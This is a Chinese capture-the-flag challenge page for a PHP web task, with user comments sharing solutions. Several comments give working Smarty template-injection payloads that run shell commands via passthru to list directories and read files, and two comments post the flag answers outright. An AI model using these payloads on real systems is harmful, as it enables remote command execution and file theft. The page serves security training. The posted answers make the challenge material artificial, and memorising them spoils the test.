聪明的phpWEB 未解决

分数: 25 金币: 2
题目作者: midi
一  血: ⎝Lazzaro⎠
一血奖励: 3金币
解  决: 2910
提  示:
描  述:
聪明的php
评论
YUMEKO 1月前

http://xxxxxxx/?key={{passthru('tac ../../../_16018')}} key_16018 别看错了

回复 0

Daniel2023 2月前

flag{0e54d64e616af92957ddbb6c6ea37c5f}

回复 0

一路奔腾 3月前

?a={passthru("ls -al /")}找到特殊的一样_24542这样的文件,?f={passthru("tac%20/_13075")}查看文件内容得到flag。参考:https://zhuanlan.zhihu.com/p/401583380,,,,https://blog.csdn.net/m_de_g/article/details/120

回复 0

EtHat 4月前

index.php?a={passthru("tac /_4060")}

回复 0

18904484271 4月前

好垃圾的靶场,明明flag出来了,但是提交显示不正确

回复 1

haker111 6月前

看提示直接传值:?a,然后看到源码后进行解析,了解smarty模板。进行get传参,?a={if passthru('ls')}{/if} 查看当前目录,然后转到根目录下,?a={if passthru('ls /')}{/if},每个人的根目录下的第一个子目录不同,所以flag不同,查看第一目录?a=?a={if passthru('tac /_2096')}{/if},得到flag{...}

回复 0

XRain 7月前

没想起来 PHP 还有什么函数可以执行命令。不过,我用 scandir() 和 show_source() 就完成挑战了。 /?a={var_dump(scandir("/"))} 和 /?a={show_source("/_6583")}

回复 0

冯飞99 8月前

根据给出的提示发现可以通过/?回显得到源码,然后找到chatgpt解析一下源码,得知需要模板注入,构成payload,找到第二个源码再次让gpt翻译一下,得知在根目录下有个-数字的文件,由于cat命令用不了,使用tac命令查看得到flag。

回复 0

wxy1343 10月前

flag{d1342dda94d2f2b93118ff43530dcf77}

回复 0

YZ_86 11月前

bp抓包提交参数后会返回代码,根据代码可以发现有命令执行且过滤了哪几个函数{1*2}会发现返回2,这个时候用命令执行{passthru('ls /')},记得url转码,会发现返回结果有个图出的文件,cat被过滤了,用more查看就好{passthru('more /文件名')}。觉得清楚记得点赞,让更多人看到

回复 5

WriteUp

image
midi

3 金币

评分(11)

解题动态

15181405972 攻破了该题 3小时前
jadxbug 攻破了该题 13小时前
smile123 攻破了该题 23小时前
种花家十号 攻破了该题 1天前
2406044613 攻破了该题 1天前
gl 攻破了该题 1天前
r1st 攻破了该题 2天前
yeyin 攻破了该题 2天前
Bojing 攻破了该题 3天前
111jing 攻破了该题 4天前
黑色剑士 攻破了该题 5天前
野王哥哥抱抱我嘛 攻破了该题 5天前
junzijie 攻破了该题 6天前
Drume 攻破了该题 7天前
OldWolfofFarron 攻破了该题 7天前
15826978220 攻破了该题 8天前
luojilianlu 攻破了该题 9天前
18225355670 攻破了该题 9天前
2742137753 攻破了该题 9天前
zhengchujie 攻破了该题 9天前